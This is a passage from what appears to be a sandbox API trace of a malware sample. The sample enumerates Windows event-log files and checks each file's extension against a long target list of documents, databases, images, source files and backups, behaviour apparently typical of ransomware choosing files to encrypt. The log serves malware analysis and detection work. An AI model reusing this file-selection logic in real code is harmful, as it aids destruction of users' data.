ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0285.755] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0285.755] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0285.767] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0285.767] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0285.767] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0285.767] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0285.768] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0285.768] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0285.768] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0285.768] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0285.769] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0285.769] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0285.769] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0285.769] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0285.770] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0285.770] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0285.770] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0285.770] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0285.770] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0285.771] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0285.771] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0285.771] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0285.772] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0285.912] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0285.914] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0285.914] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0285.920] lstrlenW (lpString="Microsoft-Windows-NCSI%4Operational.evtx") returned 40 [0285.920] lstrlenW (lpString=".1cd") returned 4 [0285.920] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0285.920] lstrlenW (lpString=".3ds") returned 4 [0285.920] lstrcmpiW (lpString1=".3ds", lpString2="evtx") returned -1 [0285.920] lstrlenW (lpString=".3fr") returned 4 [0285.920] lstrcmpiW (lpString1=".3fr", lpString2="evtx") returned -1 [0285.921] lstrlenW (lpString=".3g2") returned 4 [0285.921] lstrcmpiW (lpString1=".3g2", lpString2="evtx") returned -1 [0285.921] lstrlenW (lpString=".3gp") returned 4 [0285.921] lstrcmpiW (lpString1=".3gp", lpString2="evtx") returned -1 [0285.921] lstrlenW (lpString=".7z") returned 3 [0285.921] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0285.921] lstrlenW (lpString=".accda") returned 6 [0285.922] lstrcmpiW (lpString1=".accda", lpString2="l.evtx") returned -1 [0285.922] lstrlenW (lpString=".accdb") returned 6 [0285.924] lstrcmpiW (lpString1=".accdb", lpString2="l.evtx") returned -1 [0285.924] lstrlenW (lpString=".accdc") returned 6 [0285.924] lstrcmpiW (lpString1=".accdc", lpString2="l.evtx") returned -1 [0285.924] lstrlenW (lpString=".accde") returned 6 [0285.924] lstrcmpiW (lpString1=".accde", lpString2="l.evtx") returned -1 [0285.926] lstrlenW (lpString=".accdt") returned 6 [0285.926] lstrcmpiW (lpString1=".accdt", lpString2="l.evtx") returned -1 [0285.926] lstrlenW (lpString=".accdw") returned 6 [0285.926] lstrcmpiW (lpString1=".accdw", lpString2="l.evtx") returned -1 [0285.926] lstrlenW (lpString=".adb") returned 4 [0285.926] lstrcmpiW (lpString1=".adb", lpString2="evtx") returned -1 [0285.927] lstrlenW (lpString=".adp") returned 4 [0285.927] lstrcmpiW (lpString1=".adp", lpString2="evtx") returned -1 [0285.927] lstrlenW (lpString=".ai") returned 3 [0285.927] lstrcmpiW (lpString1=".ai", lpString2="vtx") returned -1 [0285.927] lstrlenW (lpString=".ai3") returned 4 [0285.927] lstrcmpiW (lpString1=".ai3", lpString2="evtx") returned -1 [0285.927] lstrlenW (lpString=".ai4") returned 4 [0285.933] lstrcmpiW (lpString1=".ai4", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".ai5") returned 4 [0285.933] lstrcmpiW (lpString1=".ai5", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".ai6") returned 4 [0285.933] lstrcmpiW (lpString1=".ai6", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".ai7") returned 4 [0285.933] lstrcmpiW (lpString1=".ai7", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".ai8") returned 4 [0285.933] lstrcmpiW (lpString1=".ai8", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".anim") returned 5 [0285.933] lstrcmpiW (lpString1=".anim", lpString2=".evtx") returned -1 [0285.933] lstrlenW (lpString=".arw") returned 4 [0285.933] lstrcmpiW (lpString1=".arw", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".as") returned 3 [0285.933] lstrcmpiW (lpString1=".as", lpString2="vtx") returned -1 [0285.933] lstrlenW (lpString=".asa") returned 4 [0285.933] lstrcmpiW (lpString1=".asa", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".asc") returned 4 [0285.933] lstrcmpiW (lpString1=".asc", lpString2="evtx") returned -1 [0285.933] lstrlenW (lpString=".ascx") returned 5 [0285.933] lstrcmpiW (lpString1=".ascx", lpString2=".evtx") returned -1 [0285.933] lstrlenW (lpString=".asm") returned 4 [0285.934] lstrcmpiW (lpString1=".asm", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".asmx") returned 5 [0285.934] lstrcmpiW (lpString1=".asmx", lpString2=".evtx") returned -1 [0285.934] lstrlenW (lpString=".asp") returned 4 [0285.934] lstrcmpiW (lpString1=".asp", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".aspx") returned 5 [0285.934] lstrcmpiW (lpString1=".aspx", lpString2=".evtx") returned -1 [0285.934] lstrlenW (lpString=".asr") returned 4 [0285.934] lstrcmpiW (lpString1=".asr", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".asx") returned 4 [0285.934] lstrcmpiW (lpString1=".asx", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".avi") returned 4 [0285.934] lstrcmpiW (lpString1=".avi", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".avs") returned 4 [0285.934] lstrcmpiW (lpString1=".avs", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".backup") returned 7 [0285.934] lstrcmpiW (lpString1=".backup", lpString2="al.evtx") returned -1 [0285.934] lstrlenW (lpString=".bak") returned 4 [0285.934] lstrcmpiW (lpString1=".bak", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".bay") returned 4 [0285.934] lstrcmpiW (lpString1=".bay", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".bd") returned 3 [0285.934] lstrcmpiW (lpString1=".bd", lpString2="vtx") returned -1 [0285.934] lstrlenW (lpString=".bin") returned 4 [0285.934] lstrcmpiW (lpString1=".bin", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".bmp") returned 4 [0285.934] lstrcmpiW (lpString1=".bmp", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".bz2") returned 4 [0285.934] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".c") returned 2 [0285.934] lstrcmpiW (lpString1=".c", lpString2="tx") returned -1 [0285.934] lstrlenW (lpString=".cdr") returned 4 [0285.934] lstrcmpiW (lpString1=".cdr", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".cer") returned 4 [0285.934] lstrcmpiW (lpString1=".cer", lpString2="evtx") returned -1 [0285.934] lstrlenW (lpString=".cf") returned 3 [0285.934] lstrcmpiW (lpString1=".cf", lpString2="vtx") returned -1 [0285.934] lstrlenW (lpString=".cfc") returned 4 [0285.935] lstrcmpiW (lpString1=".cfc", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".cfm") returned 4 [0285.935] lstrcmpiW (lpString1=".cfm", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".cfml") returned 5 [0285.935] lstrcmpiW (lpString1=".cfml", lpString2=".evtx") returned -1 [0285.935] lstrlenW (lpString=".cfu") returned 4 [0285.935] lstrcmpiW (lpString1=".cfu", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".chm") returned 4 [0285.935] lstrcmpiW (lpString1=".chm", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".cin") returned 4 [0285.935] lstrcmpiW (lpString1=".cin", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".class") returned 6 [0285.935] lstrcmpiW (lpString1=".class", lpString2="l.evtx") returned -1 [0285.935] lstrlenW (lpString=".clx") returned 4 [0285.935] lstrcmpiW (lpString1=".clx", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".config") returned 7 [0285.935] lstrcmpiW (lpString1=".config", lpString2="al.evtx") returned -1 [0285.935] lstrlenW (lpString=".cpp") returned 4 [0285.935] lstrcmpiW (lpString1=".cpp", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".cr2") returned 4 [0285.935] lstrcmpiW (lpString1=".cr2", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".crt") returned 4 [0285.935] lstrcmpiW (lpString1=".crt", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".crw") returned 4 [0285.935] lstrcmpiW (lpString1=".crw", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".cs") returned 3 [0285.935] lstrcmpiW (lpString1=".cs", lpString2="vtx") returned -1 [0285.935] lstrlenW (lpString=".css") returned 4 [0285.935] lstrcmpiW (lpString1=".css", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".csv") returned 4 [0285.935] lstrcmpiW (lpString1=".csv", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".cub") returned 4 [0285.935] lstrcmpiW (lpString1=".cub", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".dae") returned 4 [0285.935] lstrcmpiW (lpString1=".dae", lpString2="evtx") returned -1 [0285.935] lstrlenW (lpString=".dat") returned 4 [0285.936] lstrcmpiW (lpString1=".dat", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".db") returned 3 [0285.936] lstrcmpiW (lpString1=".db", lpString2="vtx") returned -1 [0285.936] lstrlenW (lpString=".dbf") returned 4 [0285.936] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".dbx") returned 4 [0285.936] lstrcmpiW (lpString1=".dbx", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".dc3") returned 4 [0285.936] lstrcmpiW (lpString1=".dc3", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".dcm") returned 4 [0285.936] lstrcmpiW (lpString1=".dcm", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".dcr") returned 4 [0285.936] lstrcmpiW (lpString1=".dcr", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".der") returned 4 [0285.936] lstrcmpiW (lpString1=".der", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".dib") returned 4 [0285.936] lstrcmpiW (lpString1=".dib", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".dic") returned 4 [0285.936] lstrcmpiW (lpString1=".dic", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".dif") returned 4 [0285.936] lstrcmpiW (lpString1=".dif", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".divx") returned 5 [0285.936] lstrcmpiW (lpString1=".divx", lpString2=".evtx") returned -1 [0285.936] lstrlenW (lpString=".djvu") returned 5 [0285.936] lstrcmpiW (lpString1=".djvu", lpString2=".evtx") returned -1 [0285.936] lstrlenW (lpString=".dng") returned 4 [0285.936] lstrcmpiW (lpString1=".dng", lpString2="evtx") returned -1 [0285.936] lstrlenW (lpString=".doc") returned 4 [0285.936] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".docm") returned 5 [0285.937] lstrcmpiW (lpString1=".docm", lpString2=".evtx") returned -1 [0285.937] lstrlenW (lpString=".docx") returned 5 [0285.937] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0285.937] lstrlenW (lpString=".dot") returned 4 [0285.937] lstrcmpiW (lpString1=".dot", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".dotm") returned 5 [0285.937] lstrcmpiW (lpString1=".dotm", lpString2=".evtx") returned -1 [0285.937] lstrlenW (lpString=".dotx") returned 5 [0285.937] lstrcmpiW (lpString1=".dotx", lpString2=".evtx") returned -1 [0285.937] lstrlenW (lpString=".dpx") returned 4 